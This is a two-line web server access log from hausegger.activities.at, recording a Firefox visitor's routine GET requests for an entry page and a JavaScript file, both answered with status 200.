178.165.191.42 - - [18/Dec/2024:09:28:49 +0100] "GET /entry.php?id=10271&&ser=510469 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=510408" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:28:49 +0100] "GET /gui/javascript/form_form.js?1734510529 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=510469" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
